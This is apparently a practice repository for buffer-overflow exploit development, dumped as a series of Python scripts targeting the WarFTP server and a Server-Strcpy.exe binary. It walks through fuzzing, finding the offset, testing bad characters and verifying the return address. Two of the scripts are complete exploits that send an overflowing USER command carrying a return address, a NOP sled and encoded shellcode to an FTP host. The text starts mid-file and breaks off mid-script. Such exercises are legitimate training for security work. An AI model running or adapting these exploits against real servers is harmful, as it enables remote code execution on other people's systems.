"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | #[*] Exact match at offset 485 6 | #0x7c86467b 7 | shellcode = ("\xfc\xbb\x16\xfb\xf8\xcb\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3" 8 | "\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xea\x13\x7a\xcb\x12" 9 | "\xe4\x1b\x45\xf7\xd5\x1b\x31\x7c\x45\xac\x31\xd0\x6a\x47\x17" 10 | "\xc0\xf9\x25\xb0\xe7\x4a\x83\xe6\xc6\x4b\xb8\xdb\x49\xc8\xc3" 11 | "\x0f\xa9\xf1\x0b\x42\xa8\x36\x71\xaf\xf8\xef\xfd\x02\xec\x84" 12 | "\x48\x9f\x87\xd7\x5d\xa7\x74\xaf\x5c\x86\x2b\xbb\x06\x08\xca" 13 | "\x68\x33\x01\xd4\x6d\x7e\xdb\x6f\x45\xf4\xda\xb9\x97\xf5\x71" 14 | "\x84\x17\x04\x8b\xc1\x90\xf7\xfe\x3b\xe3\x8a\xf8\xf8\x99\x50" 15 | "\x8c\x1a\x39\x12\x36\xc6\xbb\xf7\xa1\x8d\xb0\xbc\xa6\xc9\xd4" 16 | "\x43\x6a\x62\xe0\xc8\x8d\xa4\x60\x8a\xa9\x60\x28\x48\xd3\x31" 17 | "\x94\x3f\xec\x21\x77\x9f\x48\x2a\x9a\xf4\xe0\x71\xf3\x39\xc9" 18 | "\x89\x03\x56\x5a\xfa\x31\xf9\xf0\x94\x79\x72\xdf\x63\x7d\xa9" 19 | "\xa7\xfb\x80\x52\xd8\xd2\x46\x06\x88\x4c\x6e\x27\x43\x8c\x8f" 20 | "\xf2\xfe\x84\x36\xad\x1c\x69\x88\x1d\xa1\xc1\x61\x74\x2e\x3e" 21 | "\x91\x77\xe4\x57\x3a\x8a\x07\x46\xe7\x03\xe1\x02\x07\x42\xb9" 22 | "\xba\xe5\xb1\x72\x5d\x15\x90\x2a\xc9\x5e\xf2\xed\xf6\x5e\xd0" 23 | "\x59\x60\xd5\x37\x5e\x91\xea\x1d\xf6\xc6\x7d\xeb\x97\xa5\x1c" 24 | "\xec\xbd\x5d\xbc\x7f\x5a\x9d\xcb\x63\xf5\xca\x9c\x52\x0c\x9e" 25 | "\x30\xcc\xa6\xbc\xc8\x88\x81\x04\x17\x69\x0f\x85\xda\xd5\x2b" 26 | "\x95\x22\xd5\x77\xc1\xfa\x80\x21\xbf\xbc\x7a\x80\x69\x17\xd0" 27 | "\x4a\xfd\xee\x1a\x4d\x7b\xef\x76\x3b\x63\x5e\x2f\x7a\x9c\x6f" 28 | "\xa7\x8a\xe5\x8d\x57\x74\x3c\x16\x67\x3f\x1c\x3f\xe0\xe6\xf5" 29 | "\x7d\x6d\x19\x20\x41\x88\x9a\xc0\x3a\x6f\x82\xa1\x3f\x2b\x04" 30 | "\x5a\x32\x24\xe1\x5c\xe1\x45\x20\x5c\x05\xba\xcb") 31 | #0x77c35459 32 | #ret = "\x59\x54\xc3\77" 33 | buffer = "A" * 485 + ret + "\x90" * 16 + shellcode 34 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 35 | connect=s.connect(('11.11.11.6',21)) 36 | response = s.recv(1024) 37 | print response 38 | s.send('USER ' + buffer + '\r\n') 39 | response = s.recv(1024) 40 | print response 41 | s.send('PASS PASSWORD\r\n') 42 | s.close() 43 | 44 | -------------------------------------------------------------------------------- /second/warftp/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | #buffer = "A" * 1100 4 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | #[*] Exact match at offset 485 6 | buffer = "A" * 485 + "B" * 4 + "C" * 20 7 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 8 | connect=s.connect(('11.11.11.6',21)) 9 | response = s.recv(1024) 10 | print response 11 | s.send('USER ' + buffer + '\r\n') 12 | response = s.recv(1024) 13 | print response 14 | s.send('PASS PASSWORD\r\n') 15 | s.close() 16 | 17 | -------------------------------------------------------------------------------- /second/warftp/offsetverify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | #buffer = "A" * 1100 4 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | #[*] Exact match at offset 485 6 | #0x7c86467b 7 | 8 | badchars = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 9 | badchars += "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 10 | badchars += "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 11 | badchars += "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 12 | badchars += "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 13 | badchars += "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 14 | badchars += "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 15 | badchars += "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 16 | badchars += "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 17 | badchars += "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 18 | badchars += "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 19 | badchars += "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 20 | badchars += "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 21 | badchars += "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 22 | badchars += "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 23 | badchars += "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 24 | 25 | 26 | 27 | #ret = "\x7b\x46\x86\7b" 28 | buffer = "A" * 485 + "B" * 4 + "\x90" * 16 + badchars 29 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 30 | connect=s.connect(('11.11.11.6',21)) 31 | response = s.recv(1024) 32 | print response 33 | s.send('USER ' + buffer + '\r\n') 34 | response = s.recv(1024) 35 | print response 36 | s.send('PASS PASSWORD\r\n') 37 | s.close() 38 | 39 | -------------------------------------------------------------------------------- /second/warftp/ret.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | #buffer = "A" * 1100 4 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | #[*] Exact match at offset 485 6 | #0x7c86467b 7 | 8 | ret = "\x7b\x46\x86\7b" 9 | buffer = "A" * 485 + ret + "\x90" * 16 + "C" * 4 10 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 11 | connect=s.connect(('11.11.11.6',21)) 12 | response = s.recv(1024) 13 | print response 14 | s.send('USER ' + buffer + '\r\n') 15 | response = s.recv(1024) 16 | print response 17 | s.send('PASS PASSWORD\r\n') 18 | s.close() 19 | 20 | -------------------------------------------------------------------------------- /second/warftp/retsploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | #buffer = "A" * 1100 4 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | #[*] Exact match at offset 485 6 | #0x7c86467b 7 | #0x77c35459 8 | shellcode = "" 9 | shellcode += "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e" 10 | shellcode += "\x81\x76\x0e\x92\xd6\xf8\x90\x83\xee\xfc\xe2\xf4" 11 | shellcode += "\x6e\x3e\x7a\x90\x92\xd6\x98\x19\x77\xe7\x38\xf4" 12 | shellcode += "\x19\x86\xc8\x1b\xc0\xda\x73\xc2\x86\x5d\x8a\xb8" 13 | shellcode += "\x9d\x61\xb2\xb6\xa3\x29\x54\xac\xf3\xaa\xfa\xbc" 14 | shellcode += "\xb2\x17\x37\x9d\x93\x11\x1a\x62\xc0\x81\x73\xc2" 15 | shellcode += "\x82\x5d\xb2\xac\x19\x9a\xe9\xe8\x71\x9e\xf9\x41" 16 | shellcode += "\xc3\x5d\xa1\xb0\x93\x05\x73\xd9\x8a\x35\xc2\xd9" 17 | shellcode += "\x19\xe2\x73\x91\x44\xe7\x07\x3c\x53\x19\xf5\x91" 18 | shellcode += "\x55\xee\x18\xe5\x64\xd5\x85\x68\xa9\xab\xdc\xe5" 19 | shellcode += "\x76\x8e\x73\xc8\xb6\xd7\x2b\xf6\x19\xda\xb3\x1b" 20 | shellcode += "\xca\xca\xf9\x43\x19\xd2\x73\x91\x42\x5f\xbc\xb4" 21 | shellcode += "\xb6\x8d\xa3\xf1\xcb\x8c\xa9\x6f\x72\x89\xa7\xca" 22 | shellcode += "\x19\xc4\x13\x1d\xcf\xbe\xcb\xa2\x92\xd6\x90\xe7" 23 | shellcode += "\xe1\xe4\xa7\xc4\xfa\x9a\x8f\xb6\x95\x29\x2d\x28" 24 | shellcode += "\x02\xd7\xf8\x90\xbb\x12\xac\xc0\xfa\xff\x78\xfb" 25 | shellcode += "\x92\x29\x2d\xfa\x9a\x8f\xa8\x72\x6f\x96\xa8\xd0" 26 | shellcode += "\xc2\xbe\x12\x9f\x4d\x36\x07\x45\x05\xbe\xfa\x90" 27 | shellcode += "\x83\x8a\x71\x76\xf8\xc6\xae\xc7\xfa\x14\x23\xa7" 28 | shellcode += "\xf5\x29\x2d\xc7\xfa\x61\x11\xa8\x6d\x29\x2d\xc7" 29 | shellcode += "\xfa\xa2\x14\xab\x73\x29\x2d\xc7\x05\xbe\x8d\xfe" 30 | shellcode += "\xdf\xb7\x07\x45\xfa\xb5\x95\xf4\x92\x5f\x1b\xc7" 31 | shellcode += "\xc5\x81\xc9\x66\xf8\xc4\xa1\xc6\x70\x2b\x9e\x57" 32 | shellcode += "\xd6\xf2\xc4\x91\x93\x5b\xbc\xb4\x82\x10\xf8\xd4" 33 | shellcode += "\xc6\x86\xae\xc6\xc4\x90\xae\xde\xc4\x80\xab\xc6" 34 | shellcode += "\xfa\xaf\x34\xaf\x14\x29\x2d\x19\x72\x98\xae\xd6" 35 | shellcode += "\x6d\xe6\x90\x98\x15\xcb\x98\x6f\x47\x6d\x08\x25" 36 | shellcode += "\x30\x80\x90\x36\x07\x6b\x65\x6f\x47\xea\xfe\xec" 37 | shellcode += "\x98\x56\x03\x70\xe7\xd3\x43\xd7\x81\xa4\x97\xfa" 38 | shellcode += "\x92\x85\x07\x45" 39 | 40 | 41 | 42 | ret = "\x59\x54\xc3\77" 43 | buffer = "A" * 485 + ret + "\x90" * 10 + shellcode 44 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 45 | connect=s.connect(('11.11.11.6',21)) 46 | response = s.recv(1024) 47 | print response 48 | s.send('USER ' + buffer + '\r\n') 49 | response = s.recv(1024) 50 | print response 51 | s.send('PASS PASSWORD\r\n') 52 | s.close() 53 | 54 | -------------------------------------------------------------------------------- /second/warftp/retverify.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | #buffer = "A" * 1100 4 | #buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 5 | #[*] Exact match at offset 485 6 | #0x7c86467b 7 | #0x77c35459 8 | ret = "\x59\x54\xc3\77" 9 | buffer = "A" * 485 + ret + "\x90" * 16 10 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 11 | connect=s.connect(('11.11.11.6',21)) 12 | response = s.recv(1024) 13 | print response 14 | s.send('USER ' + buffer + '\r\n') 15 | response = s.recv(1024) 16 | print response 17 | s.send('PASS PASSWORD\r\n') 18 | s.close() 19 | 20 | -------------------------------------------------------------------------------- /server-strcpy/Server-Strcpy.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice/ef3426ace0f4c4fc9fce612eba811a9c8988bb66/server-strcpy/Server-Strcpy.exe -------------------------------------------------------------------------------- /server-strcpy/serverstrcpy.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | # Server-Strcpy.exe exploit by superkojiman 4 | # http://blog.techorganic.com 5 | 6 | import socket, sys 7 | 8 | 9 | 10 | 11 | def main(target, port): 12 | 13 | 14 | 15 | 16 | buffer = "\x41" * 900 17 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 18 | s.connect((target, int(port))) 19 | print "[+] sending payload of length", len(buffer) 20 | s.send(buffer) 21 | s.close() 22 | print "[+] done" 23 | 24 | if __name__ == "__main__": 25 | main(sys.argv[1], sys.argv[2]) 26 | -------------------------------------------------------------------------------- /server-strcpy/serverstrcpy2.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python 3 | # Server-Strcpy.exe exploit by superkojiman 4 | # http://blog.techorganic.com 5 | 6 | import socket, sys 7 | 8 | 9 | 10 | 11 | def main(target, port): 12 | #buffer = "\x41" * 900 13 | buffer = 